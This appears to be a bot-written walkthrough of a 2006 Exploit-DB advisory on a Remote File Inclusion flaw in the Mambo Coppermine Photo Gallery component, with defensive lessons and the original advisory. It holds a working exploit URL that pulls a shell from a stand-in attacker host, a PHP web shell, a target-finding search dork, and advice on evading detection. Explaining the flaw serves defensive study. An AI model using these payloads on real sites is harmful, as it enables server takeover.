By exploitdb papers bot•August 16, 2006•

papers

Understanding Mambo Component Coppermine Photo Gallery Remote File Inclusion (RFI)

What this paper is

This paper describes a vulnerability in a Mambo CMS component called "Coppermine Photo Gallery." The vulnerability is a Remote File Inclusion (RFI) flaw, meaning an attacker can trick the vulnerable web application into including and executing a file from a remote server. This can lead to arbitrary command execution on the target server.

Simple technical breakdown

The core of the vulnerability lies in how the cpg.php file handles a configuration variable, mosConfig_absolute_path. This variable is supposed to point to the absolute path of the Mambo installation. However, the code directly uses this variable in a require statement without proper sanitization or validation.

An attacker can manipulate mosConfig_absolute_path to point to a remote URL. When the require statement is executed, instead of including a local configuration file, it fetches and executes code from the attacker-controlled remote URL.

Complete code and payload walkthrough

The provided paper snippet is very concise and focuses on the vulnerable code and the exploit technique.

Vulnerable File: cpg.php (part of the Coppermine Photo Gallery component for Mambo)

Vulnerable Code Snippet:

require ($mosConfig_absolute_path."/administrator/components/com_cpg/config.cpg.php");

Explanation:

require(): This is a PHP construct that includes and evaluates the specified file. If the file is not found, it produces a fatal error. If the file is found, its code is executed.
$mosConfig_absolute_path: This is a variable that is expected to hold the absolute path to the Mambo installation directory on the server.
"/administrator/components/com_cpg/config.cpg.php": This is a hardcoded string representing the relative path to a configuration file within the Coppermine component.

How the bug works:

The require statement concatenates the value of $mosConfig_absolute_path with the relative path to the configuration file. The vulnerability arises because $mosConfig_absolute_path is not properly validated or sanitized before being used in the require statement.

Exploit Technique:

The paper suggests an attacker can override the value of $mosConfig_absolute_path by passing it as a GET parameter in the URL.

Exploit URL Example:
http://www.site.it/components/com_cpg/cpg.php?mosConfig_absolute_path=http://evil.xxx/shell.txt?

Explanation of Exploit URL:

http://www.site.it/components/com_cpg/cpg.php: This is the target URL, pointing to the vulnerable cpg.php file.
?mosConfig_absolute_path=: This part injects the mosConfig_absolute_path variable as a GET parameter.
http://evil.xxx/shell.txt?: This is the attacker-controlled remote URL.
- http://evil.xxx/: The attacker's server.
- shell.txt: A file hosted on the attacker's server containing malicious PHP code (a web shell).
- ?: The trailing question mark is often used to terminate the path and ensure that any subsequent characters are not interpreted as part of the filename by the remote server, but are instead passed to the script being executed. In this context, it's likely to ensure the require function correctly interprets the URL.

When the vulnerable cpg.php script processes this URL, the require statement will effectively become:

require ("http://evil.xxx/shell.txt?");

PHP's require function, when given a URL that starts with http:// or https://, will attempt to fetch the content from that URL and execute it as PHP code, provided that allow_url_fopen is enabled in the server's PHP configuration.

Payload:

The paper mentions http://evil.xxx/shell.txt?. This implies that shell.txt would contain PHP code, typically a web shell. A common web shell for this era might look something like this:

<?php
// Simple web shell
if(isset($_REQUEST['cmd'])){
    echo '<pre>';
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo '</pre>';
    die;
}
?>

Explanation of the Payload (Web Shell):

<?php ... ?>: Standard PHP tags.
if(isset($_REQUEST['cmd'])): Checks if a GET or POST parameter named cmd is present.
echo '<pre>';: Outputs an HTML <pre> tag for formatted output.
$cmd = ($_REQUEST['cmd']);: Retrieves the command to be executed from the cmd parameter.
system($cmd);: Executes the command on the server's operating system.
echo '</pre>';: Closes the HTML <pre> tag.
die;: Stops script execution.

Mapping:

cpg.php: The vulnerable script.
$mosConfig_absolute_path: The variable that is manipulated.
require(...): The PHP function that executes the RFI.
http://evil.xxx/shell.txt?: The attacker-controlled remote file containing the payload.
shell.txt content: The actual malicious PHP code (web shell).

Practical details for offensive operations teams

Required Access Level: Low. This is a remote, unauthenticated vulnerability. An attacker only needs to be able to send HTTP requests to the target web server.
Lab Preconditions:
- A vulnerable Mambo installation with the Coppermine Photo Gallery component.
- A controlled remote server to host the malicious payload (shell.txt).
- PHP configured on the target server with allow_url_fopen enabled. This is a critical prerequisite for RFI to work.
Tooling Assumptions:
- A web browser or an HTTP request tool (like curl, Burp Suite, OWASP ZAP) to craft and send the exploit URL.
- A simple web server (e.g., Python's http.server, Apache, Nginx) on the attacker's machine to host the shell.txt payload.
Execution Pitfalls:
- allow_url_fopen disabled: If this PHP directive is disabled on the target server, the require function will not fetch remote URLs, and the RFI will fail. This was a common hardening step.
- Web Application Firewalls (WAFs): Modern WAFs might detect and block requests containing suspicious URL patterns or attempts to include remote files.
- URL Encoding: Special characters in the payload URL might need to be URL-encoded.
- Path Traversal in Payload: If the attacker's shell.txt tries to access files using relative paths, it might be affected by the current working directory of the PHP process.
- Component/Version Specificity: The vulnerability is tied to a specific component and likely a specific version or range of versions of Mambo and the Coppermine component.
- Trailing Slash in mosConfig_absolute_path: The exploit might be sensitive to whether the attacker-provided path ends with a slash or not, depending on how the concatenation is handled. The example uses a trailing ? which is often used to ensure the URL is parsed correctly.
Tradecraft Considerations:
- Reconnaissance: Identifying Mambo installations and the presence of the Coppermine component is crucial. The dork inurl:com_cpg is a good starting point for search engines.
- Payload Hosting: Ensure the payload server is stable and accessible from the target. Consider using a domain that doesn't immediately raise suspicion.
- Obfuscation: For more advanced engagements, obfuscating the web shell code within shell.txt might be considered to evade basic signature-based detection.
- Post-Exploitation: Once a shell is obtained, the immediate goal is often privilege escalation, lateral movement, or data exfiltration.

Where this was used and when

Context: This vulnerability was relevant to websites using the Mambo Content Management System (CMS) with the Coppermine Photo Gallery component installed. Mambo was a popular CMS in the mid-2000s, a precursor to Joomla!.
Approximate Years: The exploit was published in 2006. Therefore, its active exploitation would have been around 2006 and the years immediately following, until Mambo became less prevalent and patches were applied.

Defensive lessons for modern teams

Input Validation is Paramount: Never trust user-supplied input, especially when it's used in file operations or dynamic code execution. Always validate and sanitize all external inputs.
allow_url_fopen and allow_url_include: These PHP directives are often disabled by default in secure configurations for good reason. If they are enabled, ensure that applications using them have robust input validation. allow_url_include is even more dangerous as it specifically allows include, require, include_once, and require_once to use URLs.
Secure Coding Practices: Developers should be trained to avoid concatenating user input directly into file paths or require/include statements. Use whitelisting of allowed file paths or functions where possible.
Regular Patching and Updates: Keep CMS platforms, components, and plugins updated to the latest secure versions. This vulnerability was likely patched in later versions of the component or Mambo.
Web Application Firewalls (WAFs): Deploy and properly configure WAFs to detect and block common attack patterns, including RFI attempts.
Least Privilege: Ensure web server processes run with the minimum necessary privileges to limit the impact of a successful compromise.

ASCII visual (if applicable)

+-------------------+      +-------------------------------------------------+
| Attacker's Server |----->| Target Web Server (Mambo + Coppermine)          |
| (e.g., evil.xxx)  |      |                                                 |
|                   |      | +---------------------------------------------+ |
| Serves:           |      | | cpg.php                                     | |
| shell.txt (PHP)   |      | |                                             | |
+-------------------+      | | +-----------------------------------------+ | |
                           | | | require($mosConfig_absolute_path . ...) | | |
                           | | +-----------------------------------------+ | |
                           | |        ^                                    | |
                           | |        |                                    | |
                           | |        | mosConfig_absolute_path =          | |
                           | |        | http://evil.xxx/shell.txt?         | |
                           | |        v                                    | |
                           | | +-----------------------------------------+ | |
                           | | | PHP Interpreter executes remote code    | | |
                           | | +-----------------------------------------+ | |
                           | +---------------------------------------------+ |
                           +-------------------------------------------------+

Explanation of Diagram:

The diagram illustrates the flow of the attack. The attacker's server hosts the malicious shell.txt file. The target web server runs Mambo with the Coppermine component. The vulnerable cpg.php script receives an HTTP request where the mosConfig_absolute_path parameter is set to the attacker's URL. The require function in cpg.php then fetches and executes the code from shell.txt on the target server.

Source references

Paper ID: 2196
Paper Title: Mambo Component CopperminePhotoGalery - Remote File Inclusion
Author: k1tk4t
Published: 2006-08-16
Keywords: PHP, webapps
Paper URL: https://www.exploit-db.com/papers/2196

Original Exploit-DB Content (Verbatim)

###########  CopperminePhotoGallery Component ###########
Found By k1tk4t
Indonesia 
 
  This bug allows a remote atacker to execute commands via RFI

file:
cpg.php  

bug:
require ($mosConfig_absolute_path."/administrator/components/com_cpg/config.cpg.php");



path:
add in cpg.php
defined( '_VALID_MOS' ) or die( 'hacking attemp.' );

dork: inurl:com_cpg

expl:
htttp:/www.site.it/components/com_cpg/cpg.php?mosConfig_absolute_path=

http://evil.xxx/shell.txt?


thanks to

e-c-h-o
h4cky0u
milw0rm
google

# milw0rm.com [2006-08-16]